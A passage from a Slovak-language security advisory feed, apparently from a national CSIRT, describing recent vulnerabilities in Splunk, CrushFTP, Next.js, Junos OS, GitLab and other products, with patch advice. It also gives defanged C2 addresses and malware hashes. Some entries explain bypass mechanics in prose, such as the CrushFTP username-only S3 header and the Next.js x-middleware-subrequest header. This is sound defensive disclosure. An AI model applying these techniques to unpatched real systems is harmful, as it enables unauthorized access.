Splunk Secure Gateway 3.8.X vo verziách starších ako 3.8.38
Splunk Secure Gateway 3.7.X vo verziách starších ako 3.7.23
Splunk App for Data Science and Deep Learning vo verziách starších ako 5.2.0
Splunk Add-on for Microsoft Cloud Services 5.4.X vo verziách starších ako 5.4.3
Splunk Infrastructure Monitoring Add-on vo verziách starších ako 1.2.7
Dockerové image splunk/splunk 9.4.X vo verziách starších ako 9.4.1
Dockerové image splunk/splunk 9.3.X vo verziách starších ako 9.3.3
Dockerové image splunk/splunk 9.2.X vo verziách starších ako 9.2.5
Dockerové image splunk/splunk 9.1.X vo verziách starších ako 9.1.8
Dockerové image splunk/universalforwarder 9.4.X vo verziách starších ako 9.4.1
Dockerové image splunk/universalforwarder 9.3.X vo verziách starších ako 9.3.3
Dockerové image splunk/universalforwarder 9.2.X vo verziách starších ako 9.2.5
Dockerové image splunk/universalforwarder 9.1.X vo verziách starších ako 9.1.8

Opis činnosti:

Vysoko závažné zraniteľnosti

CVE-2025-20229 (CVSS skóre 8,0)

Zraniteľnosť v produktoch Splunk Enterprise a Splunk Cloud Platform spočíva v chýbajúcom overovaní autorizácie a vzdialený autentifikovaný útočník by ju mohol zneužiť na nahratie špeciálne vytvoreného súboru do priečinka „$SPLUNK_HOME/var/run/splunk/apptemp“ a následné vykonanie škodlivého kódu.

CVE-2025-20231 (CVSS skóre 7,1)

CVE-2025-20231 v produktoch Splunk Enterprise a Spunk Secure Gateway by vzdialený autentifikovaný útočník mohol zneužiť na získanie neoprávneného prístupu k citlivým údajom. Splunk Secure Gateway pri volaniach na REST API „/services/ssg/secrets“ do logového súboru splunk_secure_gateway.log ukladá údaje o relácii používateľa a autentifikačné tokeny vo forme otvoreného textu. Samotná zraniteľnosť spočíva v nesprávnom nastavení oprávnení. Používateľom s nízkymi oprávneniami umožňuje spustiť vyhľadávanie s oprávneniami vyššie privilegovaných používateľov. Zneužitie zraniteľnosti vyžaduje interakciu zo strany obete, ktorá musí prostredníctvom webového prehliadača iniciovať požiadavku na predmetné API.

Zraniteľnosti strednej závažnosti

Ostatné zraniteľnosti strednej závažnosti v Splunk Enterprise, Splunk Cloud Platform a Spunk Secure Gateway možno zneužiť na realizáciu CSRF (Cross Site Request Forgery) útokov (CVE-2025-20228), obídenie bezpečnostných prvkov SPL a vykonanie príkazov (CVE-2025-20232, CVE-2025-20226), získanie neoprávneného prístupu k citlivý údajom (CVE-2025-20227) a vykonanie neoprávnených zmien v systéme (CVE-2025-20230).

Zraniteľnosti v komponentoch tretích strán

Bezpečnostné aktualizácie zároveň opravujú viacero zraniteľností v externých komponentoch (idna, certifi, requests, urllib3, cryptography, axios a Jinja2), ktoré sú využívané v rámci produktov Splunk.

Možné škody:

Vzdialené vykonanie kódu
Neoprávnený prístup k citlivým údajom
Obídenie bezpečnostných prvkov
Vykonanie neoprávnených zmien v systéme

Odporúčania:

Aktualizácia zraniteľných systémov na verzie špecifikované v časti Zraniteľné systémy.

Zraniteľnosť CVE-2025-20231 je možné mitigovať deaktiváciou Splunk Secure Gateway App podľa postupu na stránke výrobcu.

Zdroje:

Kritická zraniteľnosť CrushFTP umožňuje obísť prihlasovanie

Marian Danko — Mon, 07 Apr 2025 12:00:10 +0000

CrushFTP obsahuje aktívne zneužívanú kritickú zraniteľnosť vo svojom autentifikačnom mechanizme, ktorá dovoľuje prihlásiť sa len s uvedením prihlasovacieho mena.

Zraniteľné systémy:

CrushFTP 10.0.0 – 10.8.3
CrushFTP 11.0.0 – 11.3.0

Opis činnosti:

CVE-2025-2825 (CVSS skóre 9,8)

Vývojári CrushFTP opravili kritickú zraniteľnosť CVE-2025-2825, ktorá umožňuje obídenie autentifikácie a získanie neoprávneného prístupu k zraniteľným systémom. Zraniteľnosť sa nachádza vo funkcii autentifikačného mechanizmu loginCheckHeaderAuth() v súbore ServerSessionHTTP.java. Útočník môže poslať autentifikačnú požiadavky s hlavičkou S3, ktorá obsahuje iba používateľské meno (Credential=username/). Pokiaľ toto neobsahuje tildu (~), parameter pre preskočenie kontroly hesla je nastavený na hodnotu „true“ a útočník získa prístup do systému.

Útočníci zraniteľnosť aktívne zneužívajú. Bezpečnostná platforma Shadowserver zaznamenala desiatky pokusov o zneužitie tejto zraniteľnosti na verejne dostupných CrushFTP serveroch.

Možné škody:

Obídenie autentifikácie
Získanie kontroly nad zraniteľným systémom

Odporúčania:

Bezodkladná aktualizácia CrushFTP aspoň na verziu 10.8.4 alebo 11.3.1.

Pokiaľ aktualizácia nie je možná, môžete ju mitigovať povolením možnosti DMZ.

Odkazy:

Apple vydala opravy 213 zraniteľností v iOS, iPadOS a macOS, aktualizovala aj staršie systémy

Marian Danko — Mon, 07 Apr 2025 11:56:46 +0000

Spoločnosť Apple vydala aktualizačné balíky pre svoje systémy iOS, iPadOS a macOS, v ktorých opravuje množstvo bezpečnostných chýb. Zároveň aktualizovala aj staršie systémy iOS a iPadOS verzií 15, 16 a 17 a macOS 13 a 14, s cieľom odstrániť aktívne zneužívané zraniteľnosti zverejnené v posledných mesiacoch. Opravy vydala aj pre tvOS a visionOS.

Zraniteľné systémy:

iOS, verzie staršie ako 15.8.4, 16.7.11, 18.4
iPadOS versie staršie ako 15.8.4, 16.7.11, 17.7.6, 18.4
macOS verzie staršie ako 13.7.5, 14.7.5, 15.4

Opis činnosti:

Opravy novo objavených zraniteľností

Spoločnosť Apple vydala bezpečnostné aktualizácie, ktoré opravujú:

77 zraniteľností v iOS a iPadOS, vrátane

CVE-2025-30456 – umožňuje obísť aplikačný sandbox a zvýšiť privilégiá na úroveň používateľa root
CVE-2025-24097 – umožňuje prístup k metadátam ľubovoľných súborov
CVE-2025-31182 – umožňuje mazanie ľubovoľných súborov

123 zraniteľností v macOS Sequoia, vrátane

CVE-2025-24228 – umožňuje vykonávať ľubovoľný kód s oprávneniami jadra
CVE-2025-24267 – umožňuje zvýšenie oprávnení na úroveň používateľa root
CVE-2025-24178 – umožňuje únik zo sandboxu

13 zraniteľností v prehliadači Safari, vrátane

CVE-2025-24213 – vedie ku poškodeniu pamäte komponentu WebKit
CVE-2025-30427 – súvisí s možnosťou použitia dealokovanej pamäte
CVE-2025-24180 – súvisí s chybou pri spracovaní prihlasovacích údajov v komponente WebAuthn

Ďalšie zraniteľnosti boli opravené v tvOS a visionOS.

Opravy zneužívaných zraniteľností na starších systémoch

CVE-2025-24200 (CVSS v4.0 skóre: 7,0)

Spoločnosť vydala aktualizácie zraniteľnosti umožňujúcej deaktiváciu bezpečnostného mechanizmu USB Restricted Mode na zamknutých zariadeniach pre staršie systémy iOS a iPadOS 15 a 16.

CVE-2025-24201 (CVSS skóre: 8,8)

Spoločnosť vydala aktualizácie zraniteľnosti v komponente WebKit umožňujúcej únik z Web Content sandboxu a vzdialené vykonanie kódu pre staršie systémy iOS a iPadOS 15 a 16.

CVE-2025-24085 (CVSS skóre: 7,8)

Spoločnosť vydala aktualizácie zraniteľnosti v komponente Core Media umožňujúcej eskaláciu privilégií pre staršie systémy macOS Sonoma 14, macOS Ventura 13 a iPadOS 17.

Možné škody:

Obídenie bezpečnostných prvkov
Vzdialené vykonávanie kódu
Eskalácia oprávnení
Únik citlivých informácií

Odporúčania:

Bezodkladná aktualizácia systémov Apple aspoň na verzie:

iOS 15.8.4
iOS 16.7.11
iOS 18.4
iPadOS 15.8.4
iPadOS 16.7.11
iPadOS 17.7.6
iPadOS 18.4
macOS Ventura 13.7.5
macOS Sonoma 14.7.5
macOS Sequoia 15.4

Odkazy:

Mesačný prehľad kritických zraniteľností marec 2025

Marian Danko — Tue, 01 Apr 2025 12:10:03 +0000

Na našej web stránke boli doplnené informácie o závažných bezpečnostných udalostiach a zraniteľnostiach informačných systémov zaznamenaných v mesiaci marec 2025.

Mesačný prehľad – 03/2025 PDF (549 kB)

Prehľady sú spracovávané od októbra 2014 a sú dostupné na tomto odkaze.

Kritická zraniteľnosť tlačiarní Canon

Marian Danko — Mon, 31 Mar 2025 08:50:11 +0000

Spoločnosť Canon opravila kritickú zraniteľnosť v ovládačoch viacerých svojich zariadení, ktorá umožňuje znefunkčniť tlač, a potenciálne vykonať ľubovoľný kód.

Zraniteľné systémy:

Generic Plus PCL6 Printer Driver – V3.12 a staršie
Generic Plus UFR II Printer Driver – V3.12 a staršie
Generic Plus LIPS4 Printer Driver – V3.12 a staršie
Generic Plus LIPSLX Printer Driver – V3.12 a staršie
Generic Plus PS Printer Driver – V3.12 a staršie

Opis činnosti:

CVE-2025-1268 (CVSSv3.1 skóre 9,4)

Vývojári spoločnosti Canon opravili kritickú zraniteľnosť v ovládačoch niektorých zariadení, ktorá súvisí s možnosťou pristupovať k pamäti mimo povolené hodnoty pri spracovaní EMF Recode. Neautentifikovaný útočník so sieťovým prístupom môže po jej úspešnom zneužití pri spracovaní tlačovej úlohy dosiahnuť zamedzenie tlače a potenciálne získať schopnosť vykonať ľubovoľný kód.

Možné škody:

Nedostupnosť služby (DoS)
Vykonávanie ľubovoľného kódu

Odporúčania:

Bezodkladná aktualizácia ovládačov Generic Plus PCL6 Printer Driver, Generic Plus UFR II Printer Driver, Generic Plus LIPS4 Printer Driver, Generic Plus LIPSLX Printer Driver a Generic Plus PS Printer Driver na najnovšiu verziu (novšiu ako V3.12).

Odkazy:

Kritická zraniteľnosť Mozilla Firefox

Marian Danko — Fri, 28 Mar 2025 13:32:55 +0000

Spoločnosť Mozilla opravila kritickú chybu vo svojom prehliadači Firefox, ktorá v OS Windows umožňuje vykonať únik zo sandboxu prehliadača. Zraniteľnosť sa podobá na CVE-2025-2783, ktorú v súčasnosti opravila spoločnosť Google vo svojom prehliadači Chrome.

Zraniteľné systémy:

Mozilla Firefox pre Windows verzie staršej ako 136.0.4
Firefox ESR pre Windows verzie staršej ako 128.8.1
Firefox ESR pre Windows verzie staršej ako 115.21.1

Opis činnosti:

CVE-2025-2857

Spoločnosť Mozilla vydala aktualizáciu internetového prehliadača Firefox na opravu kritickej zraniteľnosti CVE-2025-2857, ktorá umožňuje útočníkom obísť sandboxovú ochranu prehliadača na systémoch Windows. Útočník dokáže zneužiť nešpecifikovaný proces potomka tak, aby cez svoj rodičovský proces spôsobil únik zo sandboxu prehliadača.

Zraniteľnosť sa podobná na CVE-2025-2783, ktorá bola opravená nedávno v prehliadači Google Chrome. Zraniteľnosť v Chrome bola aktívne zneužívaná.

Možné škody:

Obídenie bezpečnostných prvkov

Odporúčania:

Bezodkladná aktualizácia prehliadača spoločnosti Mozilla aspoň na verzie Firefox 136.0.4, Firefox ESR 128.8.1, alebo Firefox ESR 115.21.1.

Odkazy:

VMware Tools pre Windows umožňuje obísť autentifikáciu

Marian Danko — Wed, 26 Mar 2025 14:51:36 +0000

Vývojári VMware Tools pre Windows opravili vo svojom produkte zraniteľnosť vysokej závažnosti, ktorá umožňuje obídenie autentifikácie a získanie oprávnení administrátora pre isté úkony v rámci kompromitovaného virtuálneho prostredia.

Zraniteľné systémy:

VMware Tools pre Windows 11.x.x a 12.x.x

Opis činnosti:

CVE-2025-22230 (CVSS skóre 7,8)

Spoločnosť VMware opravila vysoko závažnú zraniteľnosť v produkte VMware Tools pre Windows, ktorá umožňuje obídenie autentifikácie z dôvodu nedostatočnej kontroly prístupov. To môže útočník s nižšími oprávneniami zneužiť na vykonanie zmien na virtuálnom stroji, ktoré vyžadujú administrátorské oprávnenia.

Možné škody:

Obídenie bezpečnostných prvkov
Eskalácia privilégií

Odporúčania:

Bezodkladná aktualizácia VMware Tools pre Windows aspoň na verziu 12.5.1.

Odkazy:

https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/25518

Kritická aktívne zneužívaná zraniteľnosť Google Chrome

Marian Danko — Wed, 26 Mar 2025 14:50:35 +0000

Google opravil kritickú zraniteľnosť vo svojom prehliadači Chrome pre Windows, ktorá umožňuje únik zo sandboxu. Zraniteľnosť je aktívne zneužívaná.

Zraniteľné systémy:

Google Chrome, verzie staršie ako 134.0.6998.177

Opis činnosti:

CVE-2025-2783 (CVSSv3 skóre 9,8)

Spoločnosť Google opravila kritickú zraniteľnosť vo verzii svojho prehliadača pre Windows, ktorá kvôli logickej chybe na rozhraní prehliadača a OS umožňuje únik z jeho sandboxu. Nachádza sa v komponente Mojo.

Zraniteľnosť je aktuálne aktívne zneužívaná pri útokoch na ruské spoločnosti. Objavili ju výskumníci spoločnosti Kaspersky, Boris Larin a Igor Kuznetsov.

Možné škody:

Obídenie bezpečnostných prvkov

Odporúčania:

Bezodkladná aktualizácia Google Chrome aspoň na verziu 134.0.6998.177/.178. Odporúčame aktualizovať aj iné prehliadače postavené na platforme Chromium.

Odkazy:

Kritická zraniteľnosť Veeam Backup & Replication

Marian Danko — Tue, 25 Mar 2025 16:14:43 +0000

Spoločnosť Veeam opravila kritickú zraniteľnosť v produkte Backup & Replication, ktorá umožňuje útočníkovi s oprávneniami doménového používateľa vzdialene vykonávať kód na serveri Backup Server.

Zraniteľné systémy:

Veeam Backup & Replication build 12, až po verziu 12.3.0.310

Opis činnosti:

CVE-2025-23120 (CVSS skóre 9,9)

Kritická zraniteľnosť umožňuje autentifikovanému používateľovi z lokálnej skupiny, alebo doménovému používateľovi vzdialene vykonávať kód na Backup Server. Chyba spočíva v neošetrenej deserializácii v triedach Veeam.Backup.Core.BackupSummary a xmlFrameworkDs.

Zraniteľnosť objavili výskumníci zo spoločnosti watchTowr a existuje pre ňu verejne dostupná ukážka jej zneužitia (PoC).

Možné škody:

Vzdialené vykonávanie kódu

Odporúčania:

Bezodkladná aktualizácia Veeam Backup & Replication aspoň na verziu 12.3.1.

Odkazy:

Kritická zraniteľnosť Next.js

Marian Danko — Tue, 25 Mar 2025 16:12:27 +0000

Framework Next.js obsahuje kritickú zraniteľnosť, ktorá umožňuje útočníkom obísť kontroly autorizácie pomocou špeciálne vytvorených požiadaviek, ak prebiehajú v Middleware a ďalej už nie.

Zraniteľné systémy:

Next.js 15.0.0 až staršie ako 15.2.3
Next.js 14.0.0 až staršie ako 14.2.25
Next.js 13.0.0 až staršie ako 13.5.9
Next.js 11.1.4 až staršie ako 12.3.5

Opis činnosti:

CVE-2025-29927 (CVSS skóre 9,1)

Kritická zraniteľnosť umožňuje obísť kontroly autorizácie v rámci inštancií Next.js, ak kontroly prebiehajú v Middleware a aplikácie používajú funkciu next start s parametrom output: ‘standalone‘.

Útočník na to môže zneužiť požiadavky s určitou hodnotou hlavičky x-middleware-subrequest, ktorá spôsobí, že kontrola požiadavky v Middleware sa preskočí, a funkcia NextResponse.next() ju prepošle priamo do cieľového bodu.

Možné škody:

Obídenie bezpečnostných prvkov

Odporúčania:

Bezodkladná aktualizácia aspoň na verziu:

Next.js 15.x na verziu 15.2.3
Next.js 14.x na verziu 14.2.25
Next.js 13.x na verziu 13.5.9
Next.js 12.x na verziu 12.3.5

Ak aktualizácia nie je možná, pre mitigáciu zraniteľnosti zakážte dostupnosť aplikácie Next.js pre externé požiadavky s hlavičkou x-middleware-subrequest.

Inštancie Next.js hostované cez riešenie Vercel a Netlify sú chránené voči danej zraniteľnosti.

Odkazy:

Kritická zraniteľnosť modulu WordPress Ghost

Marian Danko — Tue, 25 Mar 2025 16:07:47 +0000

V module WordPress Ghost bola opravená kritická zraniteľnosť, ktorá umožňuje vzdialene vykonávať kód. Chyba spočíva v možnosti vykonávať útoky typu LFI manipuláciou odkazu URL.

Zraniteľné systémy:

WordPress Ghost verzie 5.4.01 a staršie

Opis činnosti:

CVE-2025-26909 (CVSS skóre 9,6)

Kritická zraniteľnosť umožňuje neautentifikovanému útočníkovi vzdialene vykonávať kód. Chyba spočíva v nedostatočnom overovaní používateľských vstupov vo funkcii showFile(), čo umožňuje útočníkovi prechádzať medzi adresármi a vkladať ľubovoľné súbory servera do upraveného odkazu URL (útok typu Local File Inclusion).

Zraniteľnosť je aktívna, ak je vlastnosť Change Paths nastavená na mód Lite alebo Ghost.

Možné škody:

Vzdialené vykonávanie kódu

Odporúčania:

Bezodkladná aktualizácia modulu WordPress Ghost aspoň na verziu 5.4.02. Zraniteľnosť možno mitigovať zmenou nastavenia vlastnosti Change Paths na iný mód, ako Lite alebo Ghost.

Odkazy:

Mesačný prehľad kritických zraniteľností február 2025

Marian Danko — Mon, 24 Mar 2025 11:09:31 +0000

Na našej web stránke boli doplnené informácie o závažných bezpečnostných udalostiach a zraniteľnostiach informačných systémov zaznamenaných v mesiaci február 2025.

Mesačný prehľad – 02/2025 PDF (549 kB)

Prehľady sú spracovávané od októbra 2014 a sú dostupné na tomto odkaze.

Aktívne zneužívaná zraniteľnosť v operačnom systéme Juniper Junos OS

Marian Danko — Wed, 19 Mar 2025 15:57:43 +0000

Spoločnosť Juniper vydala bezpečnostné aktualizácie pre svoj sieťový operačný systém Junos OS, ktoré opravujú aktívne zneužívanú zraniteľnosť. CVE-2025-21590 by lokálny útočník s prístupom k shell-u mohol zneužiť na obídenie bezpečnostného mechanizmu Veriexec, vykonanie škodlivého kódu a získanie úplnej kontroly nad systémom.

Zraniteľné systémy:

Junos OS vo všetkých verziách starších ako 21.2R3-S9
Junos OS 21.4 vo verziách starších ako 21.4R3-S10
Junos OS 22.2 vo verziách starších ako 22.2R3-S6
Junos OS 22.4 vo verziách starších ako 22.4R3-S6
Junos OS 23.2 vo verziách starších ako 23.2R2-S3
Junos OS 23.4 vo verziách starších ako 23.4R2-S4
Junos OS 24.2 vo verziách starších ako 24.2R1-S2, 24.2R2

Pozn.: Zneužitie zraniteľnosti vyžaduje lokálny prístup k shell-u a nie je ju možné zneužiť prostredníctvom Junos CLI.

Opis zraniteľnosti:

CVE-2025-21590 (CVSS 4.0 skóre: 6,7)

Nesprávne overovanie pôvodu súborov a nedostatočnú izoláciu procesov možno injekciou kódu do legitímnych procesov zneužiť na obídenie zabudovaného bezpečnostného mechanizmu Veriexec, ktorý na Junos OS umožňuje len spustenie kódu podpísaného výrobcom. CVE-2025-21590 by lokálny autentifikovaný útočník s prístupom k shell-u mohol zneužiť na vykonanie škodlivého kódu a kompromitáciu zariadenia.

Bezpečnostní výskumníci z Google Mandiant zverejnili informácie o aktivitách čínskej kyberspionážnej skupiny UNC3886, ktorá sa dlhodobo zameriava na kompromitáciu virtualizačných platforiem a sieťových prvkov. Na prienik do systémom primárne zneužíva zero-day zraniteľnosti. UNC3886 v aktuálnej kampani na prvotný prienik do zariadení s Junos OS zneužívajú uniknuté prihlasovacie údaje a následne zraniteľnosť CVE-2025-21590 na vykonanie škodlivého kódu. Zariadenia sú infikované až 6 variantmi open-source backdooru TinyShell. Každý variant na maskovanie svojej činnosti používa iné C2 a inú metódu riadiacej komunikácie.

Možné škody:

Obídenie bezpečnostného prvku
Vzdialené vykonanie kódu

Odporúčania:

Administrátorom odporúčame vykonať bezodkladnú aktualizáciu zraniteľných systémov s Junos OS na verzie 21.2R3-S9, 21.4R3-S10, 22.2R3-S6, 22.4R3-S6, 23.2R2-S3, 23.4R2-S4, 24.2R1-S2 alebo 24.2R2.

Spoločnosť Juniper po aktualizácii systémov odporúča vykonať Quick Scan a Integrity Scan zariadení prostredníctvom nástroja JMRT (Juniper Malware Removal Tool), do ktorého boli v súvislosti s aktívnym zneužitím tejto zraniteľnosti pridané špeciálne detekčné signatúry.

Taktiež odporúčame preveriť prítomnosť indikátorov kompromitácie v logoch sieťových a bezpečnostných prvkov.

Indikátory kompromitácie:

IP adresy C2 serverov:

8[.]222[.]225[.]8:22
45[.]77[.]39[.]28:22
101[.]100[.]182[.]122:22
116[.]88[.]34[.]184:22
118[.]189[.]188[.]122:22
129[.]126[.]109[.]50:22
158[.]140[.]135[.]244:22
223[.]25[.]78[.]136:22

SHA256 hashe backdoor malwaru:

98380ec6bf4e03d3ff490cdc6c48c37714450930e4adf82e6e14d244d8373888
5bef7608d66112315eefff354dae42f49178b7498f994a728ae6203a8a59f5a2
c0ec15e08b4fb3730c5695fb7b4a6b85f7fe341282ad469e4e141c40ead310c3
5995aaff5a047565c0d7fe3c80fa354c40e7e8c3e7d4df292316c8472d4ac67a
905b18d5df58dd6c16930e318d9574a2ad793ec993ad2f68bca813574e3d854b
e1de05a2832437ab70d36c4c05b43c4a57f856289224bbd41182deea978400ed
3751997cfcb038e6b658e9180bc7cce28a3c25dbb892b661bcd1065723f11f7e
7ae38a27494dd6c1bc9ab3c02c3709282e0ebcf1e5fcf59a57dc3ae56cfd13b4

YARA pravidlá pre host-based a Snort/Suricata pravidlá pre sieťovú detekciu môžete nájsť na webovej stránky Google Mandiant.

Zdroje:

Kritické zraniteľnosti v GitLab možno zneužiť na impersonáciu používateľov a vykonanie kódu

Marian Danko — Wed, 19 Mar 2025 15:54:54 +0000

Vývojári platformy GitLab vydali bezpečnostné aktualizácie, ktoré opravujú 9 zraniteľností, z čoho 3 sú označené ako kritické. CVE-2025-25291, CVE-2025-25292 v externej knižnici ruby-saml by vzdialený autentifikovaný útočník mohol zneužiť na impersonáciu ľubovoľných používateľov v rámci SAML IdP (Identity Provider) daného prostredia. CVE-2025-27407 v knižnici graphql možno zneužiť na vzdialené vykonanie kódu.

Zraniteľné systémy:

GitLab CE (Community Edition) a EE (Enterprise Edition) 17.9.X vo verziách starších ako 17.9.2
GitLab CE (Community Edition) a EE (Enterprise Edition) 17.8.X vo verziách starších ako 17.8.5
GitLab CE (Community Edition) a EE (Enterprise Edition) 17.7.X vo verziách starších ako 17.7.7

Pozn.: Zraniteľnosť je možné zneužiť len na inštanciách GitLab s aktívnou SAML SSO autentifikáciou.

Opis zraniteľnosti:

CVE-2025-25291, CVE-2025-25292 (CVSS 4.0 skóre: 8,8)

Kritické zraniteľnosti s identifikátormi CVE-2025-25291 a CVE-2025-25292 sa nachádzajú v externej knižnici Ruby ruby-saml. Vzdialený autentifikovaný útočník disponujúci platným podpisom vytvoreným kľúčom používaným na validáciu odpovedí alebo tvrdení (eng. assertions) SAML by ich mohol zneužiť na prihlásenie sa pod účtom ľubovoľného používateľa v rámci SAML IdP daného prostredia.

CVE-2025-27407 (CVSS 3.0 skóre: 9,8)

Zraniteľnosť v externej knižnici Ruby graphql by vzdialený autentifikovaný útočník počas prenosu špeciálne vytvoreného projektu mohol pomocou beta verzie funkcie Direct Transfer zneužiť na vzdialené vykonanie kódu.

Ostatné zraniteľnosti:

Ostatné zraniteľnosti strednej závažnosti (CVE-2024-13054, CVE-2024-12380, CVE-2025-1257, CVE-2025-0652) a nízkej (CVE-2024-8402, CVE-2024-7296) možno zneužiť na vzdialené vykonanie kódu, zneprístupnenie služby, eskaláciu privilégií a získanie neoprávneného prístupu k citlivým údajom.

Možné škody:

Vzdialené vykonanie kódu
Eskalácia privilégií
Neoprávnený prístup k citlivým údajom
Neoprávnená zmena v systéme
Zneprístupnenie služby

Odporúčania:

Administrátorom odporúčame vykonať bezodkladnú aktualizáciu inštancií GitLab Community Edition a GitLab Enterprise Edition na verzie 17.9.2, 17.8.5, 17.7.7. V prípade, že aktualizáciu nie je možné vykonať, výrobca na mitigáciu kritických zraniteľností odporúča zaviesť dvojfaktorovú autentifikáciu pre všetkých používateľov, zakázať obchádzanie dvojfaktorovej autentifikácie na inštanciách autentifikáciou na báze SAML, zakázať beta funkciu Direct Transfer a zaviesť schvaľovanie nových používateľov zo strany administrátora.

Zraniteľnosti v knižniciach programovacieho jazyka Ruby (ruby-saml, graphql) odhalili bezpečnostní výskumníci spoločnosti GitHub. V súvislosti s ich existenciou administrátorom a programátorom odporúčame uistiť sa, či nepoužívajú predmetné knižnice v rámci svojich systémov a služieb. V prípade, že áno, odporúčame vykonať bezodkladnú aktualizáciu ruby-saml na verziu 1.18.0 a graphql na verzie 1.11.8, 1.12.25, 1.13.24, 2.0.32, 2.1.14, 2.2.17 alebo 2.3.21.

Zdroje:

Mozilla v súvislosti s vypršaním koreňového certifikátu vyzýva na aktualizáciu Firefox

Marian Danko — Wed, 19 Mar 2025 15:53:04 +0000

Spoločnosť Mozilla upozornila, že 14. marca 2025 vyprší jeden z koreňových certifikátov, ktorý je využívaný aj na overovanie a schvaľovanie doplnkov webového prehliadača Firefox a používateľov vyzvala vykonanie bezodkladnej aktualizácie systémov.

Prečo je aktualizácia dôležitá?

Koreňový certifikát je kľúčovým prvkom zabezpečenia Firefoxu, ktorý bráni neoprávneným zásahom a zaručuje dôveryhodnosť vydávaných balíčkov. Podľa upozornenia spoločnosti Mozilla neaktualizované systémy po 14. marci 2025 nebudú schopné využívať zásuvné moduly a niektoré pokročilé funkcie a budú vystavené aj ďalším bezpečnostným rizikám vyplývajúcich z používania neplatného certifikátu.

Aké systémy vypršanie certifikátu ovplyvní?

Mozilla Firefox vo verziách starších ako 128
Mozilla Firefox ESR vo verziách starších ako ESR 115.13

Ako zistíte verziu svojho prehliadača Firefox?

Ak chcete zistiť verziu nainštalovaného prehliadača Firefox, postupujte podľa týchto krokov:

Otvorte prehliadač Firefox
Kliknite na tlačidlo „Ponuka“ (zvyčajne tri vodorovné čiary alebo bodky v pravom hornom rohu okna)
V ponuke vyberte možnosť „Pomocník“
Kliknite na „O prehliadači Firefox“

Týmto postupom sa Vám zobrazí okno, v ktorom je uvedené číslo aktuálnej verzie prehliadača. Pri otvorení tohto okna Firefox automaticky skontroluje aj dostupnosť aktualizácií.

Odporúčania:

Administrátorom a používateľom zasiahnutých systémov odporúčame vykonať bezodkladnú aktualizáciu webového prehliadača Firefox minimálne na verziu 128 a Firefox ESR minimálne na verziu 115.13. Aktuálne verzie prehliadačov sú 136 (rodina Firefox) a 128.8 (rodina Firefox ESR). Zároveň odporúčame dbať na pravidelnú aktualizáciu všetkých používaných systémov a zariadení, ktorá je jedným zo základným pilierov kybernetickej hygieny a ochrany pre potenciálnymi hrozbami.

Zdroje:

Aktívne zneužívaná zraniteľnosť v populárnej softvérovej knižnici FreeType

Marian Danko — Wed, 19 Mar 2025 15:51:38 +0000

Vývojári populárnej open-source softvérovej knižnice pre vykresľovanie fontov FreeType vydali bezpečnostné aktualizácie, ktoré opravujú aktívne zneužívanú zraniteľnosť vysokej závažnosti. CVE-2025-27363 by vzdialený neautentifikovaný útočník podvrhnutím špeciálne vytvorených súborov mohol zneužiť na vzdialené vykonanie kódu.

Zraniteľné systémy:

Knižnica FreeType vo verziách starších ako 2.13.0 (vrátane)

Opis zraniteľnosti:

CVE-2025-27363 (CVSS 3.1 skóre: 8,1)

Zraniteľnosť spočíva v nesprávnom parsovaní tzv. font subglyph štruktúr. Vzdialený neautentifikovaný útočník by ju podvrhnutím špeciálne vytvorených TrueType GX a súborov fontov mohol zneužiť na zápis mimo povolených hodnôt pamäte. To mu môže dovoliť vzdialene vykonať kód a získanie kontroly nad systémom.

Podľa bezpečnostných výskumníkov z Facebook je zraniteľnosť v súčasnosti aktívne zneužívaná útočníkmi. Bližšie informácie o spôsobe a rozsahu jej zneužitia neboli zatiaľ zverejnené.

Možné škody:

Vzdialené vykonanie kódu
Narušenie dôvernosti, integrity a dostupnosti systému

Odporúčania:

Administrátorom a programátorom odporúčame uistiť sa, či nepoužívajú predmetnú knižnicu v rámci svojich produktov a služieb. V prípade, že áno, odporúčame vykonať bezodkladnú aktualizáciu knižnice FreeType na verziu 2.13.3.

Zdroje:

Microsoft v rámci marcového Patch Tuesday opravil 6 kritických zraniteľností

Marian Danko — Wed, 19 Mar 2025 15:47:39 +0000

Spoločnosť Microsoft vydala v marci 2025 balík opráv pre portfólio svojich produktov opravujúci 58 zraniteľností, z ktorých 23 umožňuje vzdialené vykonanie kódu. Kritické zraniteľnosti nachádzajúce sa v produktoch Microsoft Office a Microsoft Dataverse a komponentoch Windows Remote Desktop Services, Remote Desktop Client, Windows Domain Name Service a Windows Subsystem for Linux (WSL2) možno zneužiť na eskaláciu privilégií a vzdialené vykonanie kódu.

Zraniteľné systémy:

ASP.NET Core 8.0
ASP.NET Core 9.0
Azure ARC
Azure Agent for Backup
Azure Agent for Site Recovery
Azure CLI
Azure promptflow-core
Azure promptflow-tools
Microsoft 365 Apps for Enterprise for 32-bit Systems
Microsoft 365 Apps for Enterprise for 64-bit Systems
Microsoft Access 2016 (32-bit edition)
Microsoft Access 2016 (64-bit edition)
Microsoft Dataverse
Microsoft Excel 2016 (32-bit edition)
Microsoft Excel 2016 (64-bit edition)
Microsoft Office 2016 (32-bit edition)
Microsoft Office 2016 (64-bit edition)
Microsoft Office 2019 for 32-bit editions
Microsoft Office 2019 for 64-bit editions
Microsoft Office LTSC 2021 for 32-bit editions
Microsoft Office LTSC 2021 for 64-bit editions
Microsoft Office LTSC 2024 for 32-bit editions
Microsoft Office LTSC 2024 for 64-bit editions
Microsoft Office LTSC for Mac 2021
Microsoft Office LTSC for Mac 2024
Microsoft Visual Studio 2017 version 15.9 (includes 15.0 – 15.8)
Microsoft Visual Studio 2019 version 16.11 (includes 16.0 – 16.10)
Microsoft Visual Studio 2022 version 17.10
Microsoft Visual Studio 2022 version 17.12
Microsoft Visual Studio 2022 version 17.13
Microsoft Visual Studio 2022 version 17.8
Microsoft Word 2016 (32-bit edition)
Microsoft Word 2016 (64-bit edition)
Office Online Server
Remote Desktop client for Windows Desktop
Visual Studio Code
WinDbg
Windows 10 Version 1607 for 32-bit Systems
Windows 10 Version 1607 for x64-based Systems
Windows 10 Version 1809 for 32-bit Systems
Windows 10 Version 1809 for x64-based Systems
Windows 10 Version 21H2 for 32-bit Systems
Windows 10 Version 21H2 for ARM64-based Systems
Windows 10 Version 21H2 for x64-based Systems
Windows 10 Version 22H2 for 32-bit Systems
Windows 10 Version 22H2 for ARM64-based Systems
Windows 10 Version 22H2 for x64-based Systems
Windows 10 for 32-bit Systems
Windows 10 for x64-based Systems
Windows 11 Version 22H2 for ARM64-based Systems
Windows 11 Version 22H2 for x64-based Systems
Windows 11 Version 23H2 for ARM64-based Systems
